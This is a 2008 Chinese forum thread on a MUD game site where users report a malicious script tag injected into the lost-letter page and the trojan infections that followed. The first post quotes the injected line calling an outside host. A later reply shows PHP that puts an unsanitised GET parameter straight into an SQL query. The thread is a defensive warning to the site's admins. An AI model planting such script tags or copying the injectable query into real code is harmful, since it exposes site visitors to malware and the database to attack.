找回密码
 注册
搜索
查看: 2363|回复: 10

Master来看一下

  [复制链接]
门派:不明
发表于 2008-7-9 18:25:26 | 显示全部楼层 |阅读模式
今天查看丢失信件的时候。http://www.sjever.net/bbs/loseletter.php这页面提示运行加载项。看源代码发现一段恶意代码,然后测试几个页面,登陆、退出的时候也有这种情况。建议master整理一下论坛,以避免造成数据丢失。

我发到这个版块只是想引起Master注意而已,不要扣我分啊。

恶意代码:<script src=http://wo94ni.cn/mm/></script>  

下边放上我截下来的图片

刚才考虑了一下,这段恶意代码时有时无,也有可能是同机房的机器上中了ARP病毒。不管怎样master你还是检查一下论坛程序的好。

[ 本帖最后由 dlink@zy 于 2008-7-9 18:30 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×

评分

1

查看全部评分

门派:不明
发表于 2008-7-9 20:40:59 | 显示全部楼层
谢谢黄豆的提醒,还好我最近不收信
门派:不明
发表于 2008-7-9 21:03:08 | 显示全部楼层
fear,不过我以前没注意过
门派:不明
发表于 2008-7-9 23:25:28 | 显示全部楼层
是服务器的问题 我也遇到了 今天晚上刚刷新丢失信件页面就感觉和中午的不一样了
门派:不明
 楼主| 发表于 2008-7-9 23:36:04 | 显示全部楼层
应该不是我电脑中毒。我在两台服务器上打开论坛页面也出现这种情况。
还有chgk也发现这个问题了。
恶意代码时有时无,估计是机房有电脑中ARP病毒。
建议大家自己电脑都安装好杀毒软件、防火墙。
门派:不明
发表于 2008-7-10 00:01:21 | 显示全部楼层
原帖由 dlink@zy 于 2008-7-9 18:25 发表
今天查看丢失信件的时候。http://www.sjever.net/bbs/loseletter.php这页面提示运行加载项。看源代码发现一段恶意代码,然后测试几个页面,登陆、退出的时候也有这种情况。建议master整理一下论坛,以避免造成数据丢 ...


master看我呢?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
发表于 2008-7-10 00:46:27 | 显示全部楼层
的确是有这个问题,
我查了一下BBS的本地代码也没有被改动.
应该是discuz的问题
目前来看好象也没什么危害
只能等官方补丁
门派:不明
发表于 2008-7-10 09:03:37 | 显示全部楼层
$uid = $_GET["uid"];
$query =  ($db->query("select * from loseletter where username='{$uid}'"));
if (mysql_num_rows($query)==1)  {
$thread = $db->fetch_array($query);
$_SESSION['imgstr'] = '请把信送给:'.$thread['sendtoid'];//生成验证码并存入sessionecho <<<eot
<img src="authcode.php"/><br/>
eot;
}
else echo '现在没有你要送的信,如有问题请联系管理员。
门派:不明
发表于 2008-7-10 09:25:57 | 显示全部楼层
没危害吗?我电脑上发现一堆木马,害我昨天一晚上都没挂机了,关机了事,今天早上一来搞了半天才杀干净,也是打开lostletter页面时,出现跟clong一样的提示,然后我跟我同事的电脑同时中标(他也在玩这个站)。

然后电脑上被自动装上了一个什么农历提示的软件,日期被修改,卡巴自动退出。。。。

气死我了,从来不上乱七八糟的网站,没想到上这个也会中标,郁闷。。。
门派:不明
发表于 2008-7-10 10:51:26 | 显示全部楼层
要求master给元宝补偿俺
2008-7-10 00:01
这么晚了俺都没睡觉,还得俺今天困死了。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|书剑永恒MUD ( 闽ICP备14012032号|闽公网安备 35050202000162号 )

GMT+8, 2025-5-3 09:21 , Processed in 0.038018 second(s), 28 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表